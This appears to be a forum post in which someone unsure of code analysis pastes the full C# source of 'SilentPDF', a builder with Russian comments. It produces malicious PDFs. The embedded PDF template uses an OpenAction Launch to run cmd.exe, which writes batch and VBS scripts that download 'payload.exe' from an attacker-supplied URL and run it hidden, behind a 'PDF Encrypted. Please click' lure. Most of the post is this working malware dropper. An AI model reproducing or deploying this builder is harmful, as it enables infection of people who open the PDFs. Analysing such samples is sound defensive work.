Im not Good on code analyses.. but I found some hex strings on it ..
C#:
using System;
using System.CodeDom;
using System.Diagnostics;
using System.Drawing;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace SilentPDF
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void pictureBox3_Click(object sender, EventArgs e)
{
Application.Exit();
}
private void minimazeBtn_Click(object sender, EventArgs e)
{
WindowState = FormWindowState.Minimized;
}
private void Form1_MouseDown(object sender, MouseEventArgs e)
{
this.Capture = false;
var msg = Message.Create(this.Handle, 0xa1, new IntPtr(2), IntPtr.Zero);
this.WndProc(ref msg);
}
private async void buildBtn_Click(object sender, EventArgs e)
{
// Заменяем KINGURL на значение из urlBox
string pdfContent = ReplaceUrlPlaceholder(GetPdfTemplate(), urlBox.Text);
if (string.IsNullOrEmpty(pdfContent))
{
cmdBox.ForeColor = Color.Red;
cmdBox.Text = "Builder: URL-FORM cannot be empty!";
await Task.Delay(2000);
cmdBox.ForeColor = Color.Green;
cmdBox.Text = "Builder: Ready";
}
else
{
cmdBox.Text += "\nSave-File: Process";
using (SaveFileDialog saveFileDialog = new SaveFileDialog())
{
saveFileDialog.Filter = "PDF Files (*.pdf)|*.pdf";
saveFileDialog.Title = "Save PDF File";
if (saveFileDialog.ShowDialog() == DialogResult.OK)
{
// Сохраняем содержимое в выбранный файл
cmdBox.Text += "\nSave-File: Success";
SavePdfToFile(pdfContent, saveFileDialog.FileName);
cmdBox.Text += "\nBuild-Process: Success!";
cmdBox.Text += $"\nOutput: {saveFileDialog.FileName}";
Process.Start("explorer.exe", $"/select,\"{saveFileDialog.FileName}\"");
await Task.Delay(5000);
urlBox.Clear();
cmdBox.ForeColor = Color.Green;
cmdBox.Text = "Builder: Ready";
} else
{
cmdBox.Text += "\nBuild-Cancelled: Aborting . . .";
await Task.Delay(2000);
urlBox.Clear();
cmdBox.ForeColor = Color.Green;
cmdBox.Text = "Builder: Ready";
}
}
}
}
private string GetPdfTemplate()
{
// Возвращаем шаблон PDF
return @"%PDF-1.1
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
:::::::::::::::::::
1 0 obj
<<
/OpenAction <<
/S /Launch /Win
<<
/F (cmd.exe) /P (/c cD %tEMP% &@echo powershell -Command ""(New-Object Net.WebClient).DownloadFile('KINGURL', 'payload.exe')"">> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject(""Wscript.Shell"") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = ""cmd /c msd89h2j389uh.bat"" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs
PDF Encrypted. Please click)
>>
>>
/Pages 2 0 R
/Type /Catalog
>>
endobj
2 0 obj
<<
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
>>
endobj
3 0 obj
<<
/Resources <<
/Font <<
/F1 5 0 R
>>
>>
/MediaBox [ 0 0 795 842 ]
/Parent 2 0 R
/Contents 4 0 R
/Type /Page
>>
endobj
4 0 obj
<<
/Length 1260
>>stream
endobj
5 0 obj
<<
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Type /Font
>>
endobj
xref
0 6
0000000000 65535 f
0000000010 00000 n
0000000234 00000 n
0000000303 00000 n
0000000457 00000 n
0000001774 00000 n
trailer
<<
/Size 6
/Root 1 0 R
/ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]
>>
startxref
1866%%EOF";
}
private string ReplaceUrlPlaceholder(string pdfContent, string url)
{
return pdfContent.Replace("KINGURL", url);
}
private void SavePdfToFile(string content, string filePath)
{
// Сохраняем содержимое в файл
System.IO.File.WriteAllText(filePath, content);
}
private void aboutBtn_Click(object sender, EventArgs e)
{
about AboutForm = new about();
AboutForm.Show();
}
}
}